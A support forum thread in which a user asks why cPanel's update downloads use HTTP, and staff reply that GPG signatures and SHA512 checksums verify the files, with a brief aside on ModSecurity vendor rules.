cPanel updates are not over https!
Is there a reason that the following URL is only accesible over the insecure HTTP, instead of HTTPS?
Downloads | cPanel, Inc.
This is even going against your own warnings with WHM that:
We recommend that the URL support SSL in order to prevent man-in-the-middle attacks and ensure the downloaded configuration is legitimate.
-
Hello, This is documented at: Download Security - cPanel Knowledge Base - cPanel Documentation Here's a quote from this document that explains how the security works: cPanel & WHM versions 11.48 and later include functionality to validate that all files downloaded from cPanel are delivered in a pristine state. This avoids any possibility of corruption due to a compromise of cPanel"s mirror system or tampering with the server"s connection to cPanel"s systems. The new signature verification logic requires that all assets downloaded from the httpupdate mirrors are either directly validated through separate GPG signature files, or anchored to a signed asset using cryptographically secure checksums. For instance, the cPanelSync v1 manifest files are signed directly and the files referenced by the manifests are verified through SHA512 hashes. Assets downloaded from other cPanel systems (such as the public portion of our GPG keys) are validated through SSL connections.
Regarding the validation of GPG keys, these keys are downloaded from Secure Downloads | cPanel, Inc. during the nightly upcp using the system's wget binary. Let us know if you have any additional questions. Thank you.0 -
Hello, The vendor rules offered directly from cPanel should already exist under in "WHM Home " Security Center " ModSecurity" Vendors " Manage Vendors". Regarding the availability of the new OWASP rules, this is fixed in cPanel version 64: OWASP ModSecurity Core Rule Set v3 Thank you. 0
Please sign in to leave a comment.
Comments
3 comments